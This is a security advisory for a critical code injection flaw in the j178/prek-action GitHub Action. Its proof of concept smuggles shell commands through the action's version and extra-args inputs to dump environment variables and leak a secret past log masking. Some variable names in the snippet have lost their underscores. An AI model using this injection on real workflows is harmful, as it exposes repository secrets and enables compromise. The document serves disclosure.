PT-2025-42410 — Code Injection in Github Actions J178/Prek-Action

PT-2025-42410 · Github Actions · J178/Prek-Action

Published

2025-09-29

Updated

2025-09-29

CVSS v3.1

9.9

Critical

Vector

AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

There are three potential attacks of arbitrary code injection vulnerability in the composite action at action.yml .

Details

The GitHub Action variables inputs.prek-version, inputs.extra args, and inputs.extra-args can be used to execute arbitrary code in the context of the action.

PoC

yaml

- uses: j178/prek-action@v1.0.5
 with:
  prek-version: $(printenv >> $GITHUB STEP SUMMARY && echo "0.2.2")
  extra args: '&& echo "MY SECRET with a character is: ${MY SECRET:0:1}a${MY SECRET:1}" >> $GITHUB STEP SUMMARY && echo ""'
 env:
  MY SECRET: ${{ secrets.MY SECRET }}

The previous example will print all the environment variables, and it will expose MY SECRET environment variable value to the summary of the workflow. An attacker could potentially use this vector to compromise the security of the target repository, even passing unnotice because the action will run normally.

Impact

Critical, CWE-94

Fix

Code Injection

Found an issue in the description? Have something to add? Feel free to write us 👾

dbugs@ptsecurity.com

Weakness Enumeration

CWE-94

Related Identifiers

GHSA-PWF7-47C3-MFHX

Affected Products

J178/Prek-Action